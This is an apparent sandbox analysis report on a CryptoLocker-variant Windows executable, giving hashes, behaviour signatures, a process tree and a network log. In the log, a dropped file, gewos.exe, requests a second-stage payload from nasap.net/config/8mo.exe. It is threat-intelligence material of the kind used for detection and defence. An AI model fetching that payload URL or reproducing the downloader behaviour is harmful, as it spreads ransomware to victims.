Analysis

  • max time kernel
    79s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/01/2024, 04:32 UTC

General

  • Target

    2024-01-28_4fd641b34a9cefac25c637d942fdabbb_cryptolocker.exe

  • Size

    58KB

  • MD5

    4fd641b34a9cefac25c637d942fdabbb

  • SHA1

    e841ed0f4f3a799d056c9ebdf3c7bb73ee326675

  • SHA256

    6043080749c24698cf20972fef7e48d43b51df1e822b548b730e2b0af6158b5c

  • SHA512

    55f17f1f0300b23f59bd07021abf42c9bc18a4ef96c36a1907361fadfaf899bbc8452af32797b27e86cc898fb3fece66568b9d76b2ac7d2a476a65e04f357b54

  • SSDEEP

    1536:btB9g/xtCSKfxLIc//Xr+/AO/kIZ3ft2nVuTKB6nggOlHdUHc:btng54SMLr+/AO/kIhfoKMHdt

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-01-28_4fd641b34a9cefac25c637d942fdabbb_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-01-28_4fd641b34a9cefac25c637d942fdabbb_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:880

Network

  • flag-us
    DNS
    nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    nasap.net
    IN A
    Response
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Sun, 28 Jan 2024 04:32:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    X-Redirect-By: WordPress
    Location: https://www.nasap.net/config/8mo.exe
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W301 NC:000000 UP:
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    5.119.212.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.119.212.35.in-addr.arpa
    IN PTR
    Response
    5.119.212.35.in-addr.arpa
    IN PTR
    5.119.212.35.bc.googleusercontent.com
  • flag-us
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
    Response
    www.nasap.net
    IN CNAME
    nasap.net
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://www.nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Cache-Control: no-cache
    Host: www.nasap.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 28 Jan 2024 04:32:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W NC:000000 UP:
  • flag-us
    DNS
    226.20.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.20.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    64.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    64.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    149.220.183.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    149.220.183.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    114.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.110.16.96.in-addr.arpa
    IN PTR
    Response
    114.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-114.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    173.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    173.178.17.96.in-addr.arpa
    IN PTR
    Response
    173.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-173.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    23.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 35.212.119.5:443
    https://nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    1.1kB
    5.7kB
    13
    10

    HTTP Request

    GET https://nasap.net/config/8mo.exe

    HTTP Response

    301
  • 35.212.119.5:443
    https://www.nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    3.6kB
    81.3kB
    67
    64

    HTTP Request

    GET https://www.nasap.net/config/8mo.exe

    HTTP Response

    404
  • 8.8.8.8:53
    nasap.net
    dns
    gewos.exe
    55 B
    71 B
    1
    1

    DNS Request

    nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    180.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    5.119.212.35.in-addr.arpa
    dns
    71 B
    122 B
    1
    1

    DNS Request

    5.119.212.35.in-addr.arpa

  • 8.8.8.8:53
    www.nasap.net
    dns
    gewos.exe
    59 B
    89 B
    1
    1

    DNS Request

    www.nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    226.20.18.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    226.20.18.104.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    64.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    64.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    149.220.183.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    149.220.183.52.in-addr.arpa

  • 8.8.8.8:53
    26.165.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    26.165.165.52.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    114.110.16.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    114.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    173.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    173.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    23.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    23.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe

    Filesize

    59KB

    MD5

    9829dbea5d74c51c7c8fca8d68236841

    SHA1

    83b91474e64ac725524a23d77531a92e32a72261

    SHA256

    845a7e2b48555d304f3abd9e92d1201b3299a97176b2277f2d142d21b9b4392d

    SHA512

    7fe3fa845fe38d60f1960cf51c16d3e4cb3394f2a1baeb02a73e1d3991e736ce8cd44c28304d5c6448f47e17286988e852b0cb25f4ad4b2153b0e7bd6296b057

  • memory/880-20-0x00000000006F0000-0x00000000006F6000-memory.dmp

    Filesize

    24KB

  • memory/1388-0-0x0000000000740000-0x0000000000746000-memory.dmp

    Filesize

    24KB

  • memory/1388-1-0x0000000000740000-0x0000000000746000-memory.dmp

    Filesize

    24KB

  • memory/1388-2-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB